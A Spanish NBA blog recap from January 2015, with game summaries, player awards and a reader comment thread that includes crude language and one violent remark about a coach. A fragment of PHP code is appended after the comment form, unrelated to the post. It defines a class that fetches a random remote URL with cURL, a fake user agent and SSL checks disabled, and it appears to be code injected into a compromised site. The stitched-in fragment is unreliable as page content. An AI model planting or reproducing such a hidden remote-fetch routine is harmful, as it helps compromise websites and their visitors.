La Crónica: La carrera de la muerte… 2015

22 de January de 2015 por txusma

Referencia cinéfila para ilustrar la jornada de hoy, sólo para los muy frikazos y también para los muy viejunos. Stallone y Carradine, que bien podrían ser Durant y Westbrook jugándose metafóricamente la vida en la peligrosa carretera hacia los playoffs. No fue un buen día para la zona noble del Este, exceptuando a los Cavs que también mantienen la remontada. Un apunte personal: ya lo hemos visto todo con las 21 asistencias de Brandon Jennings.

Oklahoma City Thunder 105 – Washington Wizards 103

Nos vamos a divertir hasta el final de la regular cada vez que actúen los Thunder. No se pueden permitir el tono de “amistoso” que suele sobrevolar por bastantes duelos en las semanas previas al all-star. Anoche sacaron adelante el compromiso casi de milagro, con una puesta en escena que nos traslada a la serie contra los Spurs en Mayo. Durant&Westbrook en modo demolición frente al mundo. Los dos triplazos de “The Truth” en el último minuto, casualmente los dos únicos que acertó, parecían sentenciar las posibilidades de quedar primeros del Oeste. Sin embargo se las apañaron para forzar la prórroga y una vez allí imponerse en el toma y daca. El trueno anuncia al rayo, que es Russell Westbrook en carrera, indefendible para matar el partido.

Portland Trail Blazers 113 – Phoenix Suns 118

Debe de ser desalentador para los Thunder haber alcanzado este ritmo de juego y resultados para ver rara vez reducida la distancia con sus predecesores incluso en jornadas propicias para ello. Ayer los Suns se defendieron como gato panza arriba, con una actuación exagerada de “LeBroncito” Bledsoe y  Isaiah Thomas. Se beneficiaron de la baja de Aldridge, aunque los Blazers dieron toda la guerra del mundo gracias a su quinteto, incluido Dorell Wright. En cambio su segunda unidad sigue brillando por aportaciones tan escasas como la de ayer.

Toronto Raptors 86 – Memphis Grizzlies 92

El regreso de Demar DeRozan a las canchas ha sentado fatal a los canadienses.  Ha convertido a Terrence Ross en un cacho de carne inservible y ha restado protagonismo a otras piezas básicas de la plantilla. Los Grizzlies hacen pocas concesiones y cuando huelen sangre lo aprovechan. Marc Gasol volvió a ser determinante junto a su socio Zach Randolph. Sin mucho lustre otra victoria más “para la saca”.

El resto de la jornada

Decimocuarta victoria seguida de los Hawks, marca de la franquicia, esta vez ante los Pacers. Los Warriors, casi sin despeinarse, doblegaron a todo unos Houston Rockets. LeBron y sus Cavs volvían a ganar a costa de Utah y, cuidado, porque los Hornets lograban su 8ª victoria en 9 partidos en un feo choque ante los Miami Heat. Los Pistons mantienen el pulso, con Orlando de víctima, Jennings tocado por las musas de la generosidad y un descomunal Andre Drummond. Brook Lopez volvía a dejarse querer con una gran actuación ante Cousins y Chandler Parsons brilló por Dallas ante Wiggings. Los Knicks ganaron a Sixers en el partido por la cuchara de madera y Anthony Davis regresaba para ganar a los Lakers en medio de muchos rumores alrededor de Kobe.

PREMIOS

MVP: Pívot y base, bestias pardas los dos. Andre Drummond se fue a los 26 puntos y 17 rebotes mientras que Brandon Jenning anotó 24 puntos y repartió ¡21 asistencias! Sería injusto olvidar los 33 puntos, 10 rebotes, 6 asistencias y 3 robos de Eric Bledsoe pero es que es imposible no sorprenderse con estos nuevos Pistons.

Rookie: ¡Minutos para todos en Minneapolis! El rookie de los Mavs, Dwight Powell, los aprovechó a la perfección: 6 puntos y 10 rebotes en 20 minutos. Andrew Wiggins anotó 18 puntos.

Sorpresa: 17 puntos, 10 asistencias y 5 rebotes ante Lakers… Hubo un tiempo en que todos pensábamos que Eric Gordon sería uno de los grandes escoltas de la liga en un futuro cercano. Lástima de lesiones.

Decepción: No todos los días el aro se va a convertir en una piscina. 2 de 12 para Mo Williams y solo 5 puntos. Y otro día más que se confirma que Serge Ibaka no es el del año pasado. Ayer se quedó con solo 7 puntos y 5 rebotes.

Esfuerzo en vano: Los Blazers acabaron cayendo en Phoenix a pesar de los 27 puntos, 10 reboets y 5 asistencias de Nico Batum. Tampoco los Rockets pudieron llevarse la victoria a pesar de contar con un gran James Harden de las grandes noches con 33 puntos, 4 rebotes y 6 asistencias.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. rumbero dice:
    #1

    Death Race 2000, aplausos por la referencia. La escena del torero vs coche debe ser de lo mejor que se ha hecho en la historia del cine.
    Volviendo a la NBA y aunque lo hayamos dicho ya muchas veces, no deja de ser absurdo como han cambiado los Pistons moviendo sólo una pieza. Top 5 de la liga tanto en ataque como en defensa y con un Jennings que está para ir al All-Star ahora mismo.
    Before Smith : 12.6 pts, 6.4 ast, 36.8 FG%, 15.5 PER
    After Smith: 20.3 pts, 7.0 ast, 47.0 FG%, 28.8 PER

      Citar

  2. Larry Bird 33 dice:
    #2

    Increíble el cambio de Detroit, de luchar por un top 5 del draft a aspirar a algo más que primera ronda de PO. Por cierto lo de Atlanta es un milagro ya tenemos entrenador del año (lo siento por Kerr) pero este equipo es maravilloso y con, para mí, una plantilla muy inferior a la de GS, Cavs, Bulls Toronto, Wizards, OKC Spurs, Houston,…
    Por cierto de los Magic la ausencia de Harkless ya no se ni si merece la pena comentarla… vaya “entrenador” tenemos

      Citar

  3. SundayDriver dice:
    #3

    Es cierto que la plantilla de GSW parece mejor que la de Atlanta, pero no es menos cierto, ya es sabido, que el nivel en el Este es inferior al del Oeste. Ahí radica el mérito de Kerr y sus muchachos, cosa que yo al menos no preveía…

      Citar

  4. Azabel dice:
    #4

    ok, lo de los Pistons es genial, pero ya ponerlos que van a luchar mas que por una primera ronda en el draft me parece un disparate,
    En primer lugar los 6, 7, y 8vos puestos del este estan en manos de los Bucks, del Heat y de los Nets, no veo que Detorit pueda robarse fácilmente alguna de esas tres plazas, y aun asi siguen detras de los Hornets, que con muchisimo menos ruido y sin perder a su jugador “franquicia”, han ganado 8 de los ultimos 9, lo que no deja muy en claro que los Pistons puedan meterse en PO fácilmente, es muy meritorio lo suyo pero no exageremos

      Citar

  5. Triceratops dice:
    #5

    En esfuerzo en vano, creo que debería estar el 26-15 de Vucevic en un duelo magistral que tuvo anoche contra Drummond (26-17).

    Y quiero felicitar a la NBA y a Adam Silver por suprimir y borrar el infame partido de rookies vs sophomores mezclados, y poner un interesante USA vs Resto del mundo que sin duda va a generar piques y más competitividad. Apuesto que ganaran el resto del mundo. Los USA tienen perdidas importantes como Jabari Parker ó Randle.

      Citar

  6. Triceratops dice:
    #6

    Larry Bird 33:

    Por cierto de los Magic la ausencia de Harkless ya no se ni si merece la pena comentarla… vaya “entrenador” tenemos

    Yo es que paso ya de comentarlo, pero que el Devyn Marble de los cojones se esté chupando ultimamente 20 y pico minutos no tiene nombre. Ese tio no aporta absolutamente nada, es un puto cero a la izquierda y el HP de Vaughn venga a darle minutos.
    No quiero hacer apología de la violencia pero si me encontrase a Jacque Vaughn por la calle, creo que mi puño acabaría incrustado en esa sonrisa de idiota.

      Citar

  7. Azabel dice:
    #7

    anoche pude ver a los Cavs y debo decir que tienen una excelente pinta, sus 5 iniciales jugaron un partido perfecto, lujozo, rapido atrevido, su banca da pena por cierto

    J.R. Smith se ve extremandamente comprometido con el equipo, se lo nota muy activo en defensa y tomandose su tiempo para elegir sus tiros, mientras que Mozgov es una mejora notable a Anderson, no hace nada mal en ataque ni toma desiciones (para esos ya tiene 3 all-star al lado) y se limita a aprovechar excelentemente las jugadas que sus compoañeros le abren, ayer hizo de todo, tiros de corta y larga distancia, aunque se lo vio algo flojo en defensa

    la incorporacion de un jugador eminentemente de rol como Shumpert, gran defensor y sin necesidades de protagonismo en ofensiva, no deberia hacer mas que mejorar al equipo

    el tema trascendental sigue siendo la banca, Dellevadova no es un malisimo jugador, pero esta lejos de ser una pieza tan importante de un campeón, marion cada dia que pasa parece que le paso un año encima, y lo de Thompson es realmente decepcionante, en ataque no tiene prácticamente recursos y le faltan centímetros para ser un ancla defensiva

    si Shumpert pasa al cinco inicial, la adición a la banca de Smith puede ser fundamental, ya que la misma carece de alguien capaz de crear jugadas y tiros y Smith puede sentirme como pez en el agua

      Citar

  8. Ruxixón dice:
    #8

    Lo mejor de los Cavs es que al fin se ve que hay un equipo ahí,no sé hasta qué punto Waiters podría perjudicar ese ambiente,pero no deja de ser significativo.Se dice que JR se lleva bien con LeBron,eso es bastante diferente ya a tener un Waiters que exige su papel de estrella y que por ejemplo tiene detrás suyo un choque con Irving.Para mí eso es lo mejor del cambio,llegarán derrotas pero parece que están en la buena dirección,aunque sigo sin colocarlos en el primer escalón de candidatos al título.Por cierto que lo de Mozgov no tiene nada que ver,este es el jugador por el que yo apostaba como MIP (aunque luego cambie la apuesta viendo la poca bola que rascaba en Denver).Evidentemente algo tendrá que ver que su entrenador sea un viejo conocido.

    Ahora mismo yo no tocaría el quinteto,a mí me gusta que JR forme parte del mismo,está enchufado en la dinámica y le da otro aire al equipo.Con esta versión centrada colocaría a Shumpert sin dudar en la segunda unidad,a pesar de que éste sea más limitado a la hora de sumar anotación.

      Citar

  9. Azabel dice:
    #9

    El tema con Waiters creo que es mas sencillo de lo que todos imaginamos, creemos que complicaba el ambiente, que queria demasiados balones, que queria ser estrella, creo qur todo se resume en algo mas sencillo y es que simplemente NO ES TAN BUENO COMO CREEMOS

    tuvo un año rookie por encima de las pocas expectativas que habia sobre el pero nada del otro mundo, un segundo año pesimo que se cubrio por las supuesta mala relacion que existia con Irving, y este año en los Cavs para tirar a la basura

    J.R. Smith un jugador denostado por todos y que supuestamente es un lio para cualquier equipo, en un par de juegos ya ha jugado mucho mejor que lo que lo hacia Waiters, sea de titular o de suplente, con Lebron o sin Lebron, creo que simplemente J.R. es mejor jugador, no ya ofensivamente, sino integral

    Waiters me parece muy limitado, hace un poco de todo pero anda demasiado bien, tiene un tiro aceptable de 3 y de media distancia, penetra bien y define aceptablemente, y puede generarse algunos tiros, todo en la media, sucede que nada de eso lo hace particularmente bien, y encima cree que lo hace todo genial

    ahi estan los resultados

      Citar

  10. Azabel dice:
    #10

    sobre Varejao me paso algo similar, he visto muchos juegos de los Cavs con el, y se tomaba demasiadas atribuciones en ataque y salia demasiado de la pintura, no dejandole lugar de maniobra a Love, tomaba tiros forzados sin necesidad incluso

    a Mozgov lo veo volar bajo radar, un “si me dan la bola en situacion ventajo la aprovecho, sino me dedico a meter cortinas y pelear el rebote ofensivo”, creo que una mano menos en ataque como es Mozgov (que anota mucho sin tener que forzar jugadas) les ha venido de perlas a los Cavs

      Citar

  11. Larry Bird 33 dice:
    #11

    Azabel:
    ok, lo de los Pistons es genial, pero ya ponerlos que van a luchar mas que por una primera ronda en el draft me parece un disparate,
    En primer lugar los 6, 7, y 8vos puestos del este estan en manos de los Bucks, del Heat y de los Nets, no veo que Detorit pueda robarse fácilmente alguna de esas tres plazas, y aun asi siguen detras de los Hornets, que con muchisimo menos ruido y sin perder a su jugador “franquicia”, han ganado 8 de los ultimos 9, lo que no deja muy en claro que los Pistons puedan meterse en PO fácilmente, es muy meritorio lo suyo pero no exageremos

    Si siguen así los Pistons y los Hornets entran en PO y salen los Heat y los Nets basta ver las respectivas rachas de cada equipo, a saber 7-3, 8-2, 4-6 y 2-8 respectivamente y a eso añádele las sensaciones que transmiten. Y una vez dentro de PO dependiendo del cruce pueden dar guerra. Por tanto no creo que sea exagerar decir que ya no luchan por una buena posición en el draft y si que luchan por PO y para al menos luchar en primera ronda.

      Citar

  12. Larry Bird 33 dice:
    #12

    Larry Bird 33:

    Que mal he citado lo siento, quería poner esto como respuesta al comentario de Azabel:

    Si siguen así los Pistons y los Hornets entran en PO y salen los Heat y los Nets basta ver las respectivas rachas de cada equipo, a saber 7-3, 8-2, 4-6 y 2-8 respectivamente y a eso añádele las sensaciones que transmiten. Y una vez dentro de PO dependiendo del cruce pueden dar guerra. Por tanto no creo que sea exagerar decir que ya no luchan por una buena posición en el draft y si que luchan por PO y para al menos luchar en primera ronda.

      Citar

  13. Larry Bird 33 dice:
    #13

    Triceratops: Yo es que paso ya de comentarlo, pero que el Devyn Marble de los cojones se esté chupando ultimamente 20 y pico minutos no tiene nombre. Ese tio no aporta absolutamente nada, es un puto cero a la izquierda y el HP de Vaughn venga a darle minutos.
    No quiero hacer apología de la violencia pero si me encontrase a Jacque Vaughn por la calle, creo que mi puño acabaría incrustado en esa sonrisa de idiota.

    El Marble este no la elección número 56 (56!!!) del último draft o algo así? Me pregunto que puñetas le ven. Si eso para ser el 10 jugador o 11 pues vale pero ponerlo delante de Harkless que tiene potencial para ser uno de los mejores defensor perimetrales de la liga además de un buen jugador ofensivo es de juzgado de guardia.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>